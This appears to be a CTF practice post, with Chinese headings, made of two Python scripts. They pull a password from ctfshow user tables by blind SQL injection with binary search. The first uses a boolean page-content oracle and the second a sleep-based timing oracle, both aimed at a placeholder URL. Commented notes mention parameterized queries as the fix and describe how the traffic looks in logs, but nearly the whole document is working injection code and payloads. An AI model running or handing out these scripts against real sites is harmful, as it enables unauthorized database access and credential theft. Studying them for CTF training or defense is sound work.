常用单个布尔盲注二分法

import requests
# Boolean-based blind extraction by binary search (CTF exercise script).
# Base URL up to the injection point; "http://xxx" is a placeholder the
# reader substitutes.  The `id` value is closed with a quote and the
# payload is concatenated straight onto it, i.e. the weakness being
# exercised is unparameterized string concatenation of `id` into the query;
# parameterized queries remove it.  From the server side this shows up as
# a burst of near-identical GET requests that differ only in the position
# `i` and the numeric threshold `mid` -- the pattern a WAF or log rule
# keys on.
url = "http://xxx?id=1' and 1="
flag = ""  # characters recovered so far, one per outer iteration
for i in range(1,100):
    # Binary search over the code range [32, 128) for the i-th character.
    low = 32
    high = 128
    while low < high:
        mid = (low + high)//2  # midpoint of the current search range
        content = "select password from ctfshow_user4 limit 24,1"
        # Conditional payload: evaluates to 1 when the character's code is
        # below `mid`, else 0; the trailing `--+` comments out the rest.
        sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,0)--+"
        url2 = url+sql
        r = requests.get(url2)
        # Oracle: presence of "admin" in the response is taken as the true
        # branch -- page-specific; presumably the row is shown only when the
        # appended condition is true (verify against the target's response).
        if "admin" in r.text:
            high = mid
        else:
            low = mid + 1
    # Search collapsed to the lower bound: treated as "no more characters".
    # NOTE(review): relies on the DBMS evaluating the comparison as true for
    # every `mid` past the end of the string (ascii of an empty substr) --
    # confirm for the target DBMS.
    if low == high == 32:
        print("No result")
        break
    # After the loop low == high, so this is chr(high - 1), the smallest
    # code for which the "< mid" test succeeded.
    flag += chr((high + low - 1)//2)
    # NOTE(review): placement inside the loop (progress print) inferred --
    # the pasted original lost its indentation.
    print(flag)

常用单个时间盲注二分法

import time
import requests
# Time-based blind extraction by binary search (CTF exercise script).
# Same structure as the boolean variant, but the oracle is response
# latency instead of page content.  Base URL up to the injection point;
# "http://xxx" is a placeholder.  Server-side the request pattern is the
# same burst of near-identical GETs varying only in `i` and `mid`, each
# on the true branch holding a connection for about a second -- visible
# as elevated per-request latency in access logs, and removed at the root
# by parameterizing the `id` lookup.
url = "http://xxx?id=1' and "
flag = ""  # characters recovered so far, one per outer iteration
for i in range(1,100):
    # Binary search over the code range [32, 128) for the i-th character.
    low = 32
    high = 128
    while low < high:
        mid = (low + high)//2  # midpoint of the current search range
        content = "select password from ctfshow_user5 limit 24,1"
        # Conditional payload: sleeps for 1 s when the character's code is
        # below `mid`, otherwise returns immediately.
        sql = f"if(ascii(substr(({content}),{i},1))<{mid},sleep(1),0)--+"
        url2 = url+sql
        timeStart = time.time()  # wall-clock time before the request
        r = requests.get(url2)
        timeEnd = time.time()  # wall-clock time after the response
        # Oracle: a round trip of at least 1 s is read as the true branch.
        # The threshold equals the sleep argument exactly, so any false-branch
        # request whose network round trip alone reaches 1 s is misclassified.
        if timeEnd - timeStart >= 1:
            high = mid
        else:
            low = mid + 1
    # Search collapsed to the lower bound: treated as "no more characters".
    # NOTE(review): relies on the DBMS evaluating the comparison as true for
    # every `mid` past the end of the string -- confirm for the target DBMS.
    if low == high == 32:
        print("No result")
        break
    # After the loop low == high, so this is chr(high - 1), the smallest
    # code for which the "< mid" test succeeded.
    flag += chr((high + low - 1)//2)
    # NOTE(review): placement inside the loop (progress print) inferred --
    # the pasted original lost its indentation.
    print(flag)